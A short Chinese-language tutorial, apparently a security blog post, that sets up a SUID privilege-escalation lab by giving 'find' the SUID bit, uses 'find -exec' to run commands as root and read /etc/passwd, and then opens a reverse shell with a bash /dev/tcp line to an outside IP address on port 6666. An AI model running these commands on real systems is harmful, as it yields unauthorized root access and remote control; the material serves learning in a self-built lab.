suid提权的环境搭建+反弹shell

SUID（Set User ID）是一种特殊的文件权限设置，它允许文件在执行时具有文件所有者的权限。当具有SUID权限的文件被执行时，执行该文件的用户会暂时获得文件所有者的权限。这种权限通常用于需要高权限操作的程序，如‌passwd、‌sudo等。SUID权限仅对可执行文件有效，且在文件执行结束后，用户的权限会恢复到原来的状态。

1.环境搭建

# 查看find位置
which find

# 查看find权限ls -al /usr/bin/find

# 查看具有suid权限的文件，发现没有find文件
find / -perm -u=s -type f 2>/dev/null

# 切换到root用户，赋予find文件suid权限
chmod u+s /usr/bin/find

2.提权

# 再次使用find命令查看具有suid权限的文件，发现有find文件
find / -perm -u=s -type f 2>/dev/null

# 使用find命令提权，发现是用root权限执行的whoami命令
find `which find` -exec whoami \;find `which find` -exec ls \;find `which find` -exec cat /etc/passwd \;# 命令解释： 以find 命令 执行  whoami 命令。   
# find  (一个路径或文件必须存在)  -exec  执行命令 （结束）\;

3.反弹shell

# 开启监听
nc -lvvnp 6666

# 执行反弹shell命令
find /etc/passwd -exec bash -ip >& /dev/tcp/59.110.216.246/6666 0>&1 \;

好小子，离成功又进一步！！！